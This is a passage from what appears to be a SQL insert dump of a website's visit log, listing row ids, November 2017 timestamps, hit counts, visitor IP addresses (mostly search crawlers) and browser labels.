,1,0,0,'91.142.175.4','chrome'),(177816,1510737409,1,1,0,0,'217.182.132.23','other'),(177817,1510738194,1,1,0,0,'88.81.230.124','chrome'),(177818,1510738367,1,1,0,0,'216.244.66.237','other'),(177819,1510738398,1,1,0,0,'217.182.132.55','other'),(177820,1510738455,1,1,0,0,'91.196.179.134','chrome'),(177821,1510738925,1,1,0,0,'137.74.201.108','other'),(177822,1510739830,1,1,0,0,'51.255.65.92','other'),(177823,1510739920,1,1,0,0,'51.255.65.76','other'),(177824,1510740486,1,1,0,0,'87.250.224.125','other'),(177825,1510740501,1,1,0,0,'141.8.142.123','other'),(177826,1510740602,1,1,0,0,'51.255.65.35','other'),(177827,1510740785,1,1,0,0,'37.9.113.74','other'),(177828,1510740899,1,1,0,0,'37.52.21.192','chrome'),(177829,1510741419,1,1,0,0,'217.69.133.15','other'),(177830,1510741632,1,1,0,0,'217.182.132.190','other'),(177831,1510741695,1,1,0,0,'157.55.39.229','other'),(177832,1510741899,2,2,0,0,'216.244.66.237','other'),(177833,1510742434,1,1,0,0,'95.132.57.221','firefox'),(177834,1510742806,1,1,0,0,'91.196.178.65','firefox'),(177835,1510742891,1,1,0,0,'217.69.133.251','other'),(177836,1510743228,1,1,0,0,'46.211.113.28','other'),(177837,1510743796,2,2,0,0,'51.255.65.82','other'),(177838,1510743879,1,1,0,0,'216.244.66.237','other'),(177839,1510743896,1,1,0,0,'217.182.132.150','other'),(177840,1510744024,1,1,0,0,'31.43.18.150','chrome'),(177841,1510744562,1,1,0,0,'217.182.132.96','other'),(177842,1510744915,1,1,0,0,'8.29.198.25','other'),(177843,1510745140,1,1,0,0,'216.244.66.246','other'),(177844,1510745507,1,1,0,0,'178.154.200.28','other'),(177845,1510745589,1,1,0,0,'141.8.132.19','other'),(177846,1510745636,1,1,0,0,'216.244.66.237','other'),(177847,1510745650,1,1,0,0,'87.250.224.66','other'),(177848,1510745702,1,1,0,0,'217.182.132.188','other'),(177849,1510745738,1,1,0,0,'217.182.132.193','other'),(177850,1510746193,1,1,0,0,'216.244.66.194','other'),(177851,1510746254,1,1,0,0,'51.255.65.80','other'),(177852,1510746716,1,1,0,0,'51.255.71.112','other'),(177853,1510746836,1,1,0,0,'216.244.66.246','other'),(177854,1510746969,1,1,0,0,'51.255.71.115','other'),(177855,1510747117,1,1,0,0,'51.255.65.15','other'),(177856,1510747906,1,1,0,0,'217.182.132.172','other'),(177857,1510748424,1,1,0,0,'66.102.9.155','chrome'),(177858,1510748548,1,1,0,0,'66.102.9.153','chrome'),(177859,1510749375,1,1,0,0,'87.250.224.85','other'),(177860,1510751907,1,1,0,0,'216.244.66.194','other'),(177861,1510752075,2,2,0,0,'95.133.29.71','chrome'),(177862,1510752185,1,1,0,0,'217.69.133.251','other'),(177863,1510752201,1,1,0,0,'217.69.133.247','other'),(177864,1510752225,1,1,0,0,'93.171.241.65','chrome'),(177865,1510752637,1,1,0,0,'91.196.178.68','chrome'),(177866,1510752844,1,1,0,0,'37.9.113.56','other'),(177867,1510754267,1,1,0,0,'93.171.241.65','chrome'),(177868,1510754421,1,1,0,0,'216.244.66.194','other'),(177869,1510754599,1,1,0,0,'91.196.178.68','chrome'),(177870,1510755029,1,1,0,0,'178.154.200.28','other'),(177871,1510755118,1,1,0,0,'157.55.39.194','other'),(177872,1510755518,1,0,1,0,'66.249.66.219',''),(177873,1510755521,1,1,0,0,'91.196.178.68','chrome'),(177874,1510755747,1,1,0,0,'8.29.198.25','other'),(177875,1510756162,1,1,0,0,'91.196.178.67','firefox'),(177876,1510756170,1,1,0,0,'37.9.113.60','other'),(177877,1510756316,2,2,0,0,'92.113.21.223','firefox'),(177878,1510756655,1,1,0,0,'91.196.178.130','firefox'),(177879,1510757635,1,1,0,0,'91.196.178.161','chrome'),(177880,1510757892,8,8,0,0,'158.69.254.103','other'),(177881,1510758154,1,1,0,0,'91.196.178.71','firefox'),(177882,1510758403,1,1,0,0,'157.55.39.194','other'),(177883,1510758500,1,1,0,0,'130.180.220.198','other'),(177884,1510758700,1,1,0,0,'91.196.178.162','chrome'),(177885,1510760493,1,1,0,0,'162.210.196.98','other'),(177886,1510760761,1,1,0,0,'180.76.15.6','other'),(177887,1510761552,1,1,0,0,'188.32.142.69','msie'),(177888,1510762046,1,1,0,0,'157.55.39.145','other'),(177889,1510762805,1,1,0,0,'217.182.132.92','other'),(177890,1510762850,1,1,0,0,'51.255.65.31','other'),(177891,1510763152,1,1,0,0,'217.182.132.86','other'),(177892,1510763787,1,1,0,0,'141.8.142.126','other'),(177893,1510764076,1,1,0,0,'5.255.253.35','other'),(177894,1510764898,1,1,0,0,'66.249.76.91','chrome'),(177895,1510764911,1,1,0,0,'66.249.66.201','chrome'),(177896,1510765144,1,1,0,0,'51.255.65.21','other'),(177897,1510765210,1,1,0,0,'217.69.133.229','other'),(177898,1510766201,1,1,0,0,'91.209.11.236','other'),(177899,1510766586,1,1,0,0,'8.29.198.27','other'),(177900,1510767235,1,1,0,0,'95.108.213.24','other'),(177901,1510767601,1,1,0,0,'157.55.39.194','other'),(177902,1510768012,1,1,0,0,'216.244.66.237','other'),(177903,1510768289,1,1,0,0,'37.9.113.82','other'),(177904,1510769773,1,1,0,0,'141.8.142.96','other'),(177905,1510769946,1,1,0,0,'37.9.113.151','other'),(177906,1510774976,1,1,0,0,'157.55.39.37','other'),(177907,1510775141,1,1,0,0,'141.8.132.19','other'),(177908,1510775474,1,1,0,0,'217.182.132.179','other'),(177909,1510775851,1,1,0,0,'51.255.65.9','other'),(177910,1510776237,1,1,0,0,'217.182.132.35','other'),(177911,1510776284,1,1,0,0,'94.178.105.122','firefox'),(177912,1510776404,1,1,0,0,'217.69.133.13','other'),(177913,1510777419,1,1,0,0,'8.29.198.27','other'),(177914,1510777964,2,2,0,0,'216.244.66.237','other'),(177915,1510778079,1,1,0,0,'51.255.65.93','other'),(177916,1510779508,1,1,0,0,'216.244.66.237','other'),(177917,1510779539,1,1,0,0,'217.69.133.193','other'),(177918,1510780246,1,1,0,0,'217.69.133.227','other'),(177919,1510780657,1,1,0,0,'37.9.113.151','other'),(177920,1510781165,1,1,0,0,'51.255.65.49','other'),(177921,1510781274,1,0,1,0,'66.249.64.135',''),(177922,1510781595,1,1,0,0,'37.9.113.74','other'),(177923,1510781863,1,1,0,0,'81.28.166.37','firefox'),(177924,1510782307,1,1,0,0,'217.182.132.156','other'),(177925,1510782572,1,1,0,0,'164.132.162.153','other'),(177926,1510783198,1,1,0,0,'216.244.66.237','other'),(177927,1510783501,1,1,0,0,'217.182.132.184','other'),(177928,1510785030,1,1,0,0,'51.255.65.67','other'),(177929,1510785058,1,1,0,0,'216.244.66.237','other'),(177930,1510785155,1,1,0,0,'217.182.132.157','other'),(177931,1510786827,1,1,0,0,'5.45.207.69','other'),(177932,1510786955,1,1,0,0,'178.154.200.28','other'),(177933,1510788040,1,1,0,0,'200.52.85.99','firefox'),(177934,1510788042,1,1,0,0,'178.154.171.81','other'),(177935,1510788254,1,1,0,0,'8.29.198.26','other'),(177936,1510788701,1,1,0,0,'178.154.200.28','other'),(177937,1510789431,1,1,0,0,'141.8.142.96','other'),(177938,1510789657,1,1,0,0,'176.31.231.10','other'),(177939,1510789677,1,1,0,0,'51.255.65.28','other'),(177940,1510789979,1,1,0,0,'66.249.70.29','chrome'),(177941,1510790016,1,1,0,0,'157.55.39.145','other'),(177942,1510790376,1,1,0,0,'51.255.71.98','other'),(177943,1510791558,1,1,0,0,'137.74.207.101','other'),(177944,1510791965,1,1,0,0,'137.74.207.120','other'),(177945,1510792383,1,1,0,0,'217.182.132.148','other'),(177946,1510792441,1,1,0,0,'216.244.66.237','other'),(177947,1510793420,1,0,1,0,'66.249.70.25',''),(177948,1510793611,1,1,0,0,'217.182.132.30','other'),(177949,1510794289,1,1,0,0,'216.244.66.237','other'),(177950,1510795056,1,1,0,0,'51.255.65.11','other'),(177951,1510796450,1,1,0,0,'51.255.65.18','other'),(177952,1510796953,1,0,1,0,'66.249.64.30',''),(177953,1510797384,1,1,0,0,'164.132.162.164','other'),(177954,1510798048,1,1,0,0,'51.255.65.20','other'),(177955,1510799090,1,1,0,0,'8.29.198.27','other'),(177956,1510799976,1,1,0,0,'157.55.39.37','other'),(177957,1510800765,1,1,0,0,'51.255.65.96','other'),(177958,1510801390,1,1,0,0,'164.132.162.187','other'),(177959,1510803018,1,1,0,0,'217.182.132.25','other'),(177960,1510803811,1,1,0,0,'216.244.66.237','other'),(177961,1510803840,1,1,0,0,'151.80.27.118','other'),(177962,1510804003,1,1,0,0,'217.182.132.148','other'),(177963,1510804500,1,1,0,0,'141.8.132.19','other'),(177964,1510805065,1,1,0,0,'51.255.65.41','other'),(177965,1510805096,1,1,0,0,'51.255.65.36','other'),(177966,1510805665,1,1,0,0,'217.182.132.54','other'),(177967,1510805999,1,1,0,0,'137.74.207.108','other'),(177968,1510806665,1,1,0,0,'107.167.107.22','other'),(177969,1510807149,1,1,0,0,'217.182.132.30','other'),(177970,1510808151,1,1,0,0,'51.255.65.85','other'),(177971,1510808782,1,1,0,0,'217.182.132.37','other'),(177972,1510809156,1,1,0,0,'137.74.203.194','other'),(177973,1510809298,1,1,0,0,'216.244.66.237','other'),(177974,1510809760,1,1,0,0,'217.182.132.53','other'),(177975,1510809904,1,1,0,0,'176.108.6.129','firefox'),(177976,1510809924,1,1,0,0,'8.29.198.26','other'),(177977,1510810339,1,1,0,0,'51.255.65.62','other'),(177978,1510810564,1,1,0,0,'87.250.224.46','other'),(177979,1510810871,1,1,0,0,'217.182.132.4','other'),(177980,1510811563,1,1,0,0,'51.255.65.8','other'),(177981,1510811708,1,1,0,0,'217.182.132.88','other'),(177982,1510811921,1,1,0,0,'217.182.132.37','other'),(177983,1510811952,1,1,0,0,'217.182.132.20','other'),(177984,1510812505,1,1,0,0,'217.182.132.25','other'),(177985,1510812721,1,1,0,0,'217.182.132.67','other'),(177986,1510813857,1,1,0,0,'92.113.85.61','chrome'),(177987,1510815448,1,1,0,0,'91.196.178.162','chrome'),(177988,1510816087,1,1,0,0,'80.93.123.53','chrome'),(177989,1510816189,1,1,0,0,'217.182.132.58','other'),(177990,1510816477,1,1,0,0,'217.182.132.57','other'),(177991,1510816553,1,1,0,0,'157.55.39.145','other'),(177992,1510816738,1,1,0,0,'217.182.132.4','other'),(177993,1510817139,1,1,0,0,'91.196.178.67','chrome'),(177994,1510817400,1,1,0,0,'178.154.171.88','other'),(177995,1510817617,1,1,0,0,'51.255.65.67','other'),(177996,1510817739,1,1,0,0,'217.182.132.86','other'),(177997,1510817863,38,38,0,0,'204.12.208.10','other'),(177998,1510818345,1,1,0,0,'188.166.33.146','chrome'),(177999,1510818363,1,1,0,0,'141.8.142.74','other'),(178000,1510818922,1,1,0,0,'51.255.65.23','other'),(178001,1510819312,1,1,0,0,'217.182.132.81','other'),(178002,1510819676,1,1,0,0,'217.182.132.67','other'),(178003,1510819754,1,1,0,0,'141.8.142.74','other'),(178004,1510819984,1,1,0,0,'91.196.178.135','firefox'),(178005,1510820404,1,1,0,0,'51.255.71.120','other'),(178006,1510820755,1,1,0,0,'8.29.198.26','other'),(178007,1510821142,1,1,0,0,'137.74.207.120','other'),(178008,1510821180,1,1,0,0,'157.55.39.229','other'),(178009,1510821471,1,1,0,0,'95.47.151.149','chrome'),(178010,1510821853,1,1,0,0,'51.255.65.25','other'),(178011,1510821860,1,1,0,0,'217.69.134.174','other'),(178012,1510822136,1,0,1,0,'66.249.64.30',''),(178013,1510822776,1,1,0,0,'164.132.162.160','other'),(178014,1510823102,1,1,0,0,'178.154.171.88','other'),(178015,1510823194,1,1,0,0,'164.132.162.153','other'),(178016,1510824022,1,1,0,0,'141.8.142.74','other'),(178017,1510825152,1,1,0,0,'51.255.65.29','other'),(178018,1510825538,1,1,0,0,'217.69.133.253','other'),(178019,1510825638,1,1,0,0,'94.156.144.191','firefox'),(178020,1510825692,1,1,0,0,'46.219.30.147','chrome'),(178021,1510826029,1,1,0,0,'51.255.65.95','other'),(178022,1510826372,1,1,0,0,'216.244.66.237','other'),(178023,1510826817,1,1,0,0,'91.196.178.66','chrome'),(178024,1510827180,1,1,0,0,'188.166.85.82','chrome'),(178025,1510827559,1,1,0,0,'51.255.65.62','other'),(178026,1510827738,2,2,0,0,'91.196.178.104','chrome'),(178027,1510827742,1,1,0,0,'217.182.132.17','other'),(178028,1510827924,1,1,0,0,'91.196.178.65','chrome'),(178029,1510828025,1,1,0,0,'51.255.65.66','other'),(178030,1510828155,1,1,0,0,'91.196.178.71','firefox'),(178031,1510828229,1,1,0,0,'91.196.178.71','chrome'),(178032,1510829374,1,1,0,0,'217.182.132.150','other'),(178033,1510829719,1,1,0,0,'91.196.178.100','chrome'),(178034,1510829999,1,1,0,0,'137.74.201.108','other'),(178035,1510830136,2,2,0,0,'141.8.142.74','other'),(178036,1510830154,1,1,0,0,'178.154.171.88','other'),(178037,1510830197,1,1,0,0,'66.249.64.29','chrome'),(178038,1510830430,1,1,0,0,'91.196.178.166','chrome'),(178039,1510831504,1,1,0,0,'141.8.142.74','other'),(178040,1510831589,1,1,0,0,'8.29.198.25','other'),(178041,1510831808,1,1,0,0,'46.211.157.4','other'),(178042,1510832465,1,1,0,0,'51.255.71.127','other'),(178043,1510833011,1,1,0,0,'37.79.34.122','chrome'),(178044,1510833030,1,1,0,0,'141.8.142.74','other'),(178045,1510833379,1,1,0,0,'217.69.133.245','other'),(178046,1510833577,1,1,0,0,'87.250.224.46','other'),(178047,1510833606,1,1,0,0,'164.132.162.159','other'),(178048,1510833864,1,1,0,0,'51.255.65.37','other'),(178049,1510834837,38,38,0,0,'208.110.93.52','other'),(178050,1510834880,1,1,0,0,'192.81.223.221','chrome'),(178051,1510834886,1,1,0,0,'157.55.39.145','other'),(178052,1510835020,1,1,0,0,'217.182.132.184','other'),(178053,1510835520,1,1,0,0,'216.244.66.237','other'),(178054,1510835694,1,1,0,0,'37.9.113.182','other'),(178055,1510836714,1,1,0,0,'192.81.223.221','chrome'),(178056,1510837390,1,1,0,0,'217.69.133.252','other'),(178057,1510837432,1,1,0,0,'141.8.142.74','other'),(178058,1510837548,1,1,0,0,'137.74.203.194','other'),(178059,1510837932,1,1,0,0,'164.132.162.158','other'),(178060,1510837979,2,2,0,0,'178.154.171.88','other'),(178061,1510838068,1,1,0,0,'37.53.117.68','chrome'),(178062,1510838129,1,1,0,0,'91.196.178.68','firefox'),(178063,1510838544,2,2,0,0,'141.8.142.74','other'),(178064,1510838552,1,1,0,0,'51.255.65.19','other'),(178065,1510838780,1,1,0,0,'37.73.112.77','chrome'),(178066,1510839720,1,1,0,0,'91.196.178.71','chrome'),(178067,1510840140,1,1,0,0,'94.156.144.191','firefox'),(178068,1510840813,1,1,0,0,'95.135.141.38','firefox'),(178069,1510842446,1,1,0,0,'8.29.198.26','other'),(178070,1510842544,1,1,0,0,'51.255.65.91','other'),(178071,1510843037,1,1,0,0,'217.182.132.148','other'),(178072,1510843146,1,1,0,0,'91.196.178.162','chrome'),(178073,1510843222,2,2,0,0,'141.8.142.74','other'),(178074,1510843330,1,1,0,0,'216.244.66.237','other'),(178075,1510843432,1,1,0,0,'95.134.203.182','chrome'),(178076,1510843657,1,1,0,0,'51.255.71.120','other'),(178077,1510843826,1,1,0,0,'217.182.132.25','other'),(178078,1510844211,1,1,0,0,'51.255.65.68','other'),(178079,1510844533,1,1,0,0,'91.196.178.67','chrome'),(178080,1510844682,2,2,0,0,'141.8.142.74','other'),(178081,1510844696,1,1,0,0,'217.182.132.14','other'),(178082,1510844826,1,1,0,0,'91.196.178.167','chrome'),(178083,1510845094,1,1,0,0,'95.132.28.229','firefox'),(178084,1510845349,1,1,0,0,'89.178.239.5','msie'),(178085,1510846802,1,0,1,0,'66.249.64.16',''),(178086,1510847324,1,1,0,0,'51.255.65.93','other'),(178087,1510847649,1,1,0,0,'51.255.71.122','other'),(178088,1510847868,1,1,0,0,'137.74.207.116','other'),(178089,1510847982,1,1,0,0,'95.108.181.111','other'),(178090,1510848028,1,1,0,0,'141.8.142.123','other'),(178091,1510848298,1,1,0,0,'37.52.19.85','chrome'),(178092,1510849034,1,1,0,0,'37.9.113.80','other'),(178093,1510849122,1,1,0,0,'216.244.66.237','other'),(178094,1510849757,1,1,0,0,'87.250.224.66','other'),(178095,1510849761,1,1,0,0,'5.45.207.82','other'),(178096,1510849874,1,1,0,0,'198.211.121.79','chrome'),(178097,1510849909,1,1,0,0,'95.108.213.24','other'),(178098,1510850038,1,1,0,0,'66.249.64.17','chrome'),(178099,1510850735,1,1,0,0,'95.108.181.111','other'),(178100,1510850739,1,1,0,0,'5.255.253.35','other'),(178101,1510850742,1,1,0,0,'217.182.132.18','other'),(178102,1510851005,1,1,0,0,'178.154.171.56','other'),(178103,1510851076,1,1,0,0,'178.92.154.243','opera'),(178104,1510851434,1,1,0,0,'178.154.171.88','other'),(178105,1510851593,1,1,0,0,'66.249.64.15','chrome'),(178106,1510851602,1,1,0,0,'217.182.132.177','other'),(178107,1510852191,1,1,0,0,'217.182.132.83','other'),(178108,1510852457,1,1,0,0,'217.182.132.184','other'),(178109,1510853223,1,1,0,0,'194.187.170.118','other'),(178110,1510853287,1,1,0,0,'8.29.198.27','other'),(178111,1510853607,1,1,0,0,'51.255.64.106','other'),(178112,1510854039,5,5,0,0,'46.229.168.72','other'),(178113,1510854065,5,5,0,0,'46.229.168.75','other'),(178114,1510854106,5,5,0,0,'46.229.168.69','other'),(178115,1510854108,1,1,0,0,'193.194.127.217','chrome'),(178116,1510854141,9,9,0,0,'46.229.168.71','other'),(178117,1510854251,1,1,0,0,'37.9.113.74','other'),(178118,1510854311,5,5,0,0,'46.229.168.74','other'),(178119,1510854705,1,1,0,0,'51.255.65.7','other'),(178120,1510854754,1,1,0,0,'51.255.65.42','other'),(178121,1510854943,1,1,0,0,'46.229.168.72','other'),(178122,1510854947,1,1,0,0,'217.182.132.59','other'),(178123,1510854967,7,7,0,0,'46.229.168.67','other'),(178124,1510854989,7,7,0,0,'46.229.168.76','other'),(178125,1510855010,6,6,0,0,'46.229.168.69','other'),(178126,1510855035,5,5,0,0,'46.229.168.75','other'),(178127,1510855183,1,1,0,0,'137.74.207.119','other'),(178128,1510855200,4,4,0,0,'46.229.168.71','other'),(178129,1510855231,6,6,0,0,'46.229.168.73','other'),(178130,1510855395,3,3,0,0,'46.229.168.79','other'),(178131,1510855418,1,1,0,0,'87.250.224.125','other'),(178132,1510855458,5,5,0,0,'46.229.168.74','other'),(178133,1510855527,4,4,0,0,'46.229.168.68','other'),(178134,1510855572,7,7,0,0,'46.229.168.66','other'),(178135,1510855651,1,1,0,0,'188.163.16.6','chrome'),(178136,1510855677,5,5,0,0,'46.229.168.70','other'),(178137,1510855764,1,1,0,0,'51.255.65.82','other'),(178138,1510855765,2,2,0,0,'46.229.168.78','other'),(178139,1510855781,3,3,0,0,'46.229.168.77','other'),(178140,1510855818,4,4,0,0,'46.229.168.80','other'),(178141,1510856157,4,4,0,0,'46.229.168.65','other'),(178142,1510856211,2,2,0,0,'46.229.168.67','other'),(178143,1510856249,9,9,0,0,'46.229.168.71','other'),(178144,1510856303,3,3,0,0,'46.229.168.72','other'),(178145,1510856321,1,1,0,0,'46.229.168.79','other'),(178146,1510856362,3,3,0,0,'46.229.168.75','other'),(178147,1510856414,3,3,0,0,'46.229.168.73','other'),(178148,1510856462,4,4,0,0,'46.229.168.74','other'),(178149,1510856535,2,2,0,0,'46.229.168.69','other'),(178150,1510856701,1,1,0,0,'157.55.39.37','other'),(178151,1510856723,6,6,0,0,'46.229.168.76','other'),(178152,1510856787,2,2,0,0,'46.229.168.77','other'),(178153,1510856835,7,7,0,0,'46.229.168.66','other'),(178154,1510856870,10,10,0,0,'46.229.168.80','other'),(178155,1510856996,1,1,0,0,'46.229.168.68','other'),(178156,1510857014,4,4,0,0,'46.229.168.70','other'),(178157,1510857195,3,3,0,0,'46.229.168.71','other'),(178158,1510857255,3,3,0,0,'46.229.168.78','other'),(178159,1510857289,5,5,0,0,'46.229.168.65','other'),(178160,1510857386,3,3,0,0,'46.229.168.73','other'),(178161,1510857444,4,4,0,0,'46.229.168.79','other'),(178162,1510857481,3,3,0,0,'46.229.168.69','other'),(178163,1510857536,3,3,0,0,'46.229.168.67','other'),(178164,1510857671,3,3,0,0,'46.229.168.75','other'),(178165,1510857741,8,8,0,0,'46.229.168.66','other'),(178166,1510857755,1,1,0,0,'46.229.168.76','other'),(178167,1510857784,5,5,0,0,'46.229.168.72','other'),(178168,1510857879,4,4,0,0,'46.229.168.80','other'),(178169,1510857897,5,5,0,0,'46.229.168.68','other'),(178170,1510857915,6,6,0,0,'46.229.168.70','other'),(178171,1510858107,5,5,0,0,'46.229.168.74','other'),(178172,1510858170,1,1,0,0,'46.229.168.78','other'),(178174,1510858172,2,2,0,0,'46.229.168.71','other'),(178175,1510858261,3,3,0,0,'46.229.168.77','other'),(178176,1510858301,1,1,0,0,'180.76.15.162','other'),(178177,1510858469,3,3,0,0,'46.229.168.73','other'),(178178,1510858660,9,9,0,0,'46.229.168.69','other'),(178179,1510858664,4,4,0,0,'46.229.168.79','other'),(178180,1510858744,3,3,0,0,'46.229.168.72','other'),(178181,1510858808,5,5,0,0,'46.229.168.65','other'),(178182,1510858880,3,3,0,0,'46.229.168.67','other'),(178183,1510858903,3,3,0,0,'46.229.168.70','other'),(178184,1510858943,9,9,0,0,'46.229.168.76','other'),(178185,1510858973,4,4,0,0,'46.229.168.80','other'),(178186,1510859149,1,1,0,0,'46.229.168.78','other'),(178187,1510859207,1,1,0,0,'46.229.168.71','other'),(178188,1510859219,6,6,0,0,'46.229.168.68','other'),(178189,1510859263,4,4,0,0,'46.229.168.77','other'),(178190,1510859342,1,1,0,0,'51.255.65.83','other'),(178191,1510859390,6,6,0,0,'46.229.168.74','other'),(178192,1510859494,5,5,0,0,'46.229.168.73','other'),(178193,1510859718,3,3,0,0,'46.229.168.79','other'),(178194,1510859737,2,2,0,0,'217.182.132.17','other'),(178195,1510859741,4,4,0,0,'46.229.168.66','other'),(178196,1510859753,1,1,0,0,'92.242.84.253','msie'),(178197,1510859807,2,2,0,0,'46.229.168.70','other'),(178198,1510859825,3,3,0,0,'46.229.168.69','other'),(178199,1510859889,3,3,0,0,'46.229.168.76','other'),(178200,1510859902,4,4,0,0,'46.229.168.80','other'),(178201,1510859984,1,1,0,0,'217.182.132.20','other'),(178202,1510860055,7,7,0,0,'46.229.168.72','other'),(178203,1510860116,4,4,0,0,'46.229.168.78','other'),(178204,1510860167,6,6,0,0,'46.229.168.65','other'),(178205,1510860222,1,0,1,0,'66.249.64.15',''),(178206,1510860300,3,3,0,0,'46.229.168.74','other'),(178207,1510860307,1,1,0,0,'51.255.65.54','other'),(178208,1510860314,7,7,0,0,'46.229.168.67','other'),(178209,1510860411,5,5,0,0,'46.229.168.68','other'),(178210,1510860621,5,5,0,0,'46.229.168.77','other'),(178211,1510860730,2,2,0,0,'46.229.168.79','other'),(178212,1510860787,1,1,0,0,'217.182.132.81','other'),(178213,1510860816,3,3,0,0,'46.229.168.73','other'),(178214,1510860820,1,1,0,0,'217.182.132.56','other'),(178215,1510860828,5,5,0,0,'46.229.168.69','other'),(178216,1510860848,3,3,0,0,'46.229.168.71','other'),(178217,1510861067,1,1,0,0,'46.229.168.66','other'),(178218,1510861069,1,1,0,0,'195.154.146.17','other'),(178219,1510861082,1,1,0,0,'46.229.168.75','other'),(178220,1510861084,8,8,0,0,'46.229.168.76','other'),(178221,1510861141,3,3,0,0,'46.229.168.70','other'),(178222,1510861237,3,3,0,0,'46.229.168.78','other'),(178223,1510861256,3,3,0,0,'46.229.168.67','other'),(178224,1510861258,2,2,0,0,'46.229.168.72','other'),(178225,1510861367,6,6,0,0,'46.229.168.65','other'),(178226,1510861505,1,1,0,0,'46.229.168.80','other'),(178227,1510861515,1,1,0,0,'46.229.168.74','other'),(178228,1510861551,2,2,0,0,'46.229.168.77','other'),(178229,1510862836,1,1,0,0,'157.55.39.37','other'),(178230,1510864120,1,1,0,0,'8.29.198.27','other'),(178231,1510865457,1,1,0,0,'37.9.113.182','other'),(178232,1510866178,1,1,0,0,'217.182.132.154','other'),(178233,1510866542,1,1,0,0,'37.9.113.186','other'),(178234,1510866845,2,2,0,0,'178.154.171.88','other'),(178235,1510866905,1,1,0,0,'37.9.113.115','other'),(178236,1510866912,1,1,0,0,'213.180.203.8','other'),(178237,1510867107,1,1,0,0,'106.120.173.130','other'),(178238,1510868359,26,26,0,0,'136.243.68.226','other'),(178239,1510868389,1,1,0,0,'137.74.201.99','other'),(178240,1510868844,1,1,0,0,'217.182.132.170','other'),(178241,1510868879,1,1,0,0,'51.255.65.41','other'),(178242,1510869231,1,1,0,0,'194.44.36.20','chrome'),(178243,1510869263,1,0,1,0,'66.249.64.16',''),(178244,1510869760,1,1,0,0,'5.255.253.35','other'),(178245,1510870055,1,1,0,0,'46.101.92.175','chrome'),(178246,1510872250,1,1,0,0,'157.55.39.145','other'),(178247,1510872839,1,1,0,0,'216.244.66.237','other'),(178248,1510873568,1,1,0,0,'157.55.39.145','other'),(178249,1510874130,1,1,0,0,'51.255.71.131','other'),(178250,1510874688,1,0,1,0,'66.249.70.25',''),(178251,1510874790,1,1,0,0,'162.210.196.129','other'),(178252,1510874820,1,1,0,0,'216.244.66.237','other'),(178253,1510874956,1,1,0,0,'8.29.198.26','other'),(178254,1510876803,1,1,0,0,'216.244.66.237','other'),(178255,1510877591,1,1,0,0,'51.255.65.33','other'),(178256,1510877689,1,1,0,0,'51.255.71.117','other'),(178257,1510878031,1,1,0,0,'37.9.113.151','other'),(178258,1510878051,1,1,0,0,'178.154.171.24','other'),(178259,1510878222,1,1,0,0,'141.8.142.74','other'),(178260,1510878277,1,1,0,0,'51.255.65.84','other'),(178261,1510879927,1,1,0,0,'95.24.5.251','msie'),(178262,1510880147,1,1,0,0,'217.182.132.32','other'),(178263,1510880656,4,4,0,0,'54.165.59.7','other'),(178264,1510880924,1,1,0,0,'66.249.70.25','chrome'),(178265,1510883037,1,1,0,0,'217.182.132.80','other'),(178266,1510883188,1,1,0,0,'157.55.39.37','other'),(178267,1510883581,1,1,0,0,'51.255.65.30','other'),(178268,1510883645,1,1,0,0,'157.55.39.229','other'),(178269,1510884508,1,1,0,0,'51.255.65.14','other'),(178270,1510884938,1,1,0,0,'217.182.132.170','other'),(178271,1510885323,2,0,2,0,'66.249.64.28',''),(178272,1510885430,2,2,0,0,'51.255.65.97','other'),(178273,1510885792,1,1,0,0,'8.29.198.25','other'),(178274,1510886830,31,31,0,0,'142.4.200.37','other'),(178275,1510886921,1,1,0,0,'157.55.39.70','other'),(178276,1510886939,1,1,0,0,'178.154.200.8','other'),(178277,1510887228,1,1,0,0,'217.182.132.29','other'),(178278,1510887403,1,1,0,0,'157.55.39.229','other'),(178279,1510887663,1,1,0,0,'217.182.132.83','other'),(178280,1510888682,1,1,0,0,'51.255.65.92','other'),(178281,1510888878,1,0,1,0,'66.249.64.28',''),(178282,1510889921,10,10,0,0,'69.58.178.57','other'),(178283,1510891125,1,1,0,0,'51.255.65.55','other'),(178284,1510891598,1,0,1,0,'66.249.64.30',''),(178285,1510891765,1,1,0,0,'51.255.65.67','other'),(178286,1510891885,1,1,0,0,'66.249.64.28','chrome'),(178287,1510893611,1,1,0,0,'216.244.66.237','other'),(178288,1510894628,1,1,0,0,'37.9.113.132','other'),(178289,1510894738,1,1,0,0,'51.255.65.88','other'),(178290,1510895608,1,1,0,0,'51.255.65.58','other'),(178291,1510896621,1,1,0,0,'8.29.198.25','other'),(178292,1510896697,1,1,0,0,'157.55.39.145','other'),(178293,1510897424,1,1,0,0,'51.255.65.2','other'),(178294,1510898482,1,1,0,0,'5.45.207.83','other'),(178295,1510898598,1,1,0,0,'164.132.162.156','other'),(178296,1510898906,1,1,0,0,'51.255.65.94','other'),(178297,1510899259,1,1,0,0,'51.255.71.131','other'),(178298,1510900098,1,1,0,0,'217.182.132.59','other'),(178299,1510900674,1,1,0,0,'91.196.178.67','chrome'),(178300,1510901638,1,1,0,0,'213.174.10.127','chrome'),(178301,1510901804,1,1,0,0,'178.154.171.60','other'),(178302,1510902034,1,1,0,0,'217.182.132.33','other'),(178303,1510903073,1,1,0,0,'82.207.49.138','firefox'),(178304,1510903201,1,1,0,0,'216.244.66.237','other'),(178305,1510903251,1,1,0,0,'141.8.142.74','other'),(178306,1510903930,1,1,0,0,'157.55.39.70','other'),(178307,1510904260,1,0,1,0,'66.249.64.28',''),(178308,1510904512,1,1,0,0,'141.8.142.74','other'),(178309,1510905030,1,0,1,0,'66.249.64.30',''),(178310,1510905100,1,1,0,0,'66.249.64.30','chrome'),(178311,1510905288,1,1,0,0,'91.196.178.67','chrome'),(178312,1510905796,1,1,0,0,'217.182.132.77','other'),(178313,1510906125,1,1,0,0,'137.74.207.119','other'),(178314,1510906314,1,1,0,0,'216.244.66.237','other'),(178315,1510906788,1,1,0,0,'141.8.132.22','other'),(178316,1510907246,1,1,0,0,'51.255.71.128','other'),(178317,1510907302,1,1,0,0,'37.9.113.101','other'),(178318,1510907448,1,1,0,0,'8.29.198.26','other'),(178319,1510907692,1,1,0,0,'178.92.73.216','chrome'),(178320,1510907895,1,1,0,0,'216.244.66.237','other'),(178321,1510908141,1,1,0,0,'5.45.207.83','other'),(178322,1510908334,1,1,0,0,'37.9.113.157','other'),(178323,1510908338,1,1,0,0,'37.9.113.134','other'),(178324,1510908515,1,1,0,0,'91.224.96.176','firefox'),(178325,1510908567,1,1,0,0,'91.196.178.67','chrome'),(178326,1510908924,1,1,0,0,'217.182.132.170','other'),(178327,1510909518,1,1,0,0,'46.211.96.27','chrome'),(178328,1510910157,1,1,